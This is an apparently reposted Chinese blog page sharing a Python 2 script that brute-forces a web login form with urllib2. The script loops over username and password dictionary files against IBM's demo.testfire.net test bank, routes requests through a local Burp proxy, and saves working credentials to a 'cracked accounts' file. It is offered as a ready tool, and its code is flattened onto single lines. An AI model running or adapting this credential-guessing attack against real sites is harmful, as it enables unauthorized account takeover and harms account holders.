生活随笔
收集整理的這篇文章主要介紹了
使用 python 的 urllib2和 urllib模块爆破 form 表单的简易脚本
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法
腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法
# -*- coding: utf-8 -*-
import urllib2
import urllib
import timedef brute_force(user, password):#strip() 方法用于移除字符串頭尾指定的字符(默認(rèn)為空格)name = user.strip()passwd = password.strip()#添加代理:本地8080端口的代理是 burp 工具,主要是查看腳本發(fā)包回包的情況,好定位問題proxy = urllib2.ProxyHandler({"http":'http://127.0.0.1:8080'})opener = urllib2.build_opener(proxy)urllib2.install_opener(opener)#IBM 公司的一個(gè) 測試網(wǎng)站url1 = "http://demo.testfire.net/bank/login.aspx"user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}values = {'uid': name, 'passw': passwd,'btnSubmit':'Login'}data = urllib.urlencode(values)#可以把key-value這樣的鍵值對(duì)轉(zhuǎn)換成我們想要的格式,返回的是a=1&b=2這樣的字符串request = urllib2.Request(url1,data,headers)response = urllib2.urlopen(request)url2 = response.geturl()time.sleep(3)if url2 != url1:#因?yàn)閡rllib2 返回的頁面如果存在302重定向,返回的頁面是重定向之后的頁面,所以不能以302狀態(tài)碼來判斷是否登錄成功,#因?yàn)橹囟ㄏ蛑蟮捻撁嬖L問成功是200,不是302;所以以返回的頁面是不是發(fā)生變化來判斷是否是否登錄成功。print '---- find user:', name, ' with password:',passwd, '-----'print url2outFile.write(name + ':' + passwd+'\n' )else:print '----- error user:', name, ' with password:',passwd, '-----'print url2response.close()returnoutFile = open('accounts-cracked.txt', 'w')if __name__ == '__main__':#導(dǎo)入用戶名字典with open('user.dic', 'r') as userline:y = userline.readlines()#導(dǎo)入密碼的字典with open('pass.dic', 'r') as passline:b= passline.readlines()for u in y:for p in b:brute_force(user=u,password=p)outFile.close()
with open('accounts-cracked.txt','r') as text:list = text.readlines()sum=len(list)if sum>0:print "找到",sum,"個(gè)賬號(hào)密碼"
else:print "All thread OK,maybe not "
輸入有點(diǎn)丑,將就用下
總結(jié)
以上是生活随笔為你收集整理的使用 python 的 urllib2和 urllib模块爆破 form 表单的简易脚本的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。
